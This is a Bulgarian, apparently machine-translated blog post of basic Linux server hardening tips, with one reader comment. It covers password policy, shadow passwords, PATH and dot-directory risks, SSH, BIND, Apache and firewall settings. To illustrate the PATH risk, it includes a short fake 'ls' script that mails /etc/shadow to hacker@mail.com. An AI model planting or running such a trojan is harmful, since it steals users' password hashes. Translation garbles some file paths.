Съвети за сигурност за вашия Linux (сървър) (част 1)

@Jlcmux

5 Minutos

Отдавна не съм публикувал нищо в блога и бих искал да споделя с вас някои съвети, взети от книга, която (Наред с други). Намерих го в университета и току-що четох и въпреки че честно казано е малко остарял и показаните техники е много малко вероятно да работят предвид развитието на системата, те също са интересни аспекти, които могат да бъдат показани. 9788448140502

Искам да поясня, че те са съвети, ориентирани към Linux система, която се използва като сървър, в среден или може би голям мащаб, тъй като на ниво потребител на настолен компютър, въпреки че те могат да бъдат приложени, те не биха били много полезни.

Също така отбелязвам, че това са прости бързи съвети и няма да навлизам в много подробности, въпреки че планирам да направя друга много по-конкретна и обширна публикация по определена тема. Но това ще го видя по-късно. Да започваме.

Правила за пароли. 

Въпреки че звучи като крилата фраза, наличието на добра политика за пароли прави разликата между уязвима система или не. Атаките като „груба сила“ се възползват от лоша парола за достъп до система. Най-често срещаните съвети са:

  • Комбинирайте главни и малки букви.
  • Използвайте специални знаци.
  • Числа.
  • Повече от 6 цифри (надяваме се повече от 8).

В допълнение към това, нека разгледаме два основни файла.  / etc / passwd и / etc / shadow.

Нещо много важно е файлът / и т.н. / passwd. В допълнение към това, че ни дава името на потребителя, неговия uid, път на папката, bash .. и т.н. в някои случаи показва и криптиран ключ на потребителя.

 Нека разгледаме типичния му състав.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

потребител: cryptkey: uid: gid: път :: път: баш

Истинският проблем тук е, че този конкретен файл има разрешения -rw-r - r– което означава, че има разрешения за четене за всеки потребител на системата. и наличието на криптиран ключ не е много трудно да се дешифрира истинският.

Ето защо файлът съществува / и т.н. / сянка. Това е файлът, в който се съхраняват, наред с други неща, всички потребителски ключове. Този файл има необходимите разрешения, така че никой потребител да не може да го прочете.

За да поправим това тогава, трябва да отидем до файла / И т.н. / ако съществува и променете кодирания ключ на "x", това ще доведе до запазване на ключа само в нашия файл / и т.н. / сянка.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Проблеми с PATH и .bashrc и други.

Когато потребителят изпълни команда на своята конзола, обвивката търси тази команда в списък с директории, съдържащ се в променливата на средата PATH.

Ако напишете "echo $ PATH" в конзолата, тя ще изведе нещо подобно.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Всяка от тези папки е мястото, където черупката ще търси командата, написана, за да я изпълни. Той "." това означава, че първата папка за търсене е същата папка, от която се изпълнява командата.

Да предположим, че има потребител "Карлос" и той иска да "прави зло". Този потребител може да остави файл, наречен "ls" в основната си папка, и в този файл да изпълни команда като:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

И ако главният потребител за нещата от местоназначението се опита да изброи папките в папката carlos (тъй като първо търси командата в същата папка, неволно ще изпрати файла с паролите до този имейл и след това папките ще бъде включен в списъка и той няма да разбере до много късно.

За да избегнем това, трябва да премахнем „.“ на променливата PATH.

По същия начин файлове като /.bashrc, /.bashrc_profile, ./.login трябва да бъдат одитирани и да проверят дали няма "." в променливата PATH и всъщност от файлове като този можете да промените местоназначението на конкретна команда.

Съвети за услуги:

ШШ

  • Деактивирайте версия 1 на ssh протокола във файла sshd_config.
  • Не позволявайте на root потребителя да влиза в ssh.
  • Файловете и папките ssh_host_key, ssh_host_dsa_key и ssh_host_rsa_key трябва да се четат само от главния потребител.

BIND

  • Променете приветственото съобщение във файла named.conf, така че да не показва номера на версията
  • Ограничете трансферите на зони и го активирайте само за отбори, които се нуждаят от него.

Apache

  • Предотвратете показването на вашата версия в приветственото съобщение. Редактирайте файла httpd.conf и добавете или променете редовете:  

ServerSignature Off
ServerTokens Prod

  • Деактивирайте автоматичното индексиране
  • Конфигурирайте apache да не обслужва чувствителни файлове като .htacces, * .inc, * .jsp .. и др
  • Премахнете страниците с информация или пример от услугата
  • Стартирайте apache в chrooted среда

Мрежова сигурност.

Важно е да покриете всички възможни записи във вашата система от външната мрежа, ето някои основни съвети за предотвратяване на нарушителите да сканират и да получават информация от вашата мрежа.

Блокиране на ICMP трафик

Защитната стена трябва да бъде конфигурирана да блокира целия входящ и изходящ ICMP трафик и отговори на ехото. С това избягвате, че например скенер, който търси оборудване под напрежение в диапазон от IP, ви локализира. 

Избягвайте TCP сканиране на пинг.

Един от начините за сканиране на вашата система е TCP сканирането за пинг. Да предположим, че на вашия сървър има сървър Apache на порт 80. Натрапникът може да изпрати ACK заявка до този порт, с това, ако системата реагира, компютърът ще бъде жив и ще сканира останалите портове.

За целта вашата защитна стена винаги трябва да има опцията „осъзнаване на състоянието“ и да отхвърля всички ACK пакети, които не съответстват на вече установена TCP връзка или сесия.

Някои допълнителни съвети:

  • Използвайте IDS системи за откриване на сканиране на портове към вашата мрежа.
  • Конфигурирайте защитната стена, така че да не се доверява на настройките на порта за източник на връзка.

Това е така, защото някои сканирания използват "фалшив" порт на източника като 20 или 53, тъй като много системи се доверяват на тези портове, тъй като те са типични за ftp или DNS.

ЗАБЕЛЕЖКА: Не забравяйте, че повечето от проблемите, посочени в тази публикация, вече са решени в почти всички текущи дистрибуции. Но никога не пречи да имате ключова информация за тези неудобства, за да не ви се случат.

ЗАБЕЛЕЖКА: По-късно ще видя конкретна тема и ще направя публикация с много по-подробна и по-актуална информация.

Благодаря на всички за четене.

Поздрави.


Оставете вашия коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *

*

*

  1. Отговорен за данните: Мигел Анхел Гатон
  2. Предназначение на данните: Контрол на СПАМ, управление на коментари.
  3. Легитимация: Вашето съгласие
  4. Съобщаване на данните: Данните няма да бъдат съобщени на трети страни, освен по законово задължение.
  5. Съхранение на данни: База данни, хоствана от Occentus Networks (ЕС)
  6. Права: По всяко време можете да ограничите, възстановите и изтриете информацията си.

  1.   компютър каза той
    hace 8 година

    Много харесах статията и се интересувам от темата, насърчавам ви да продължите да качвате съдържание.

    Отговорете на informatico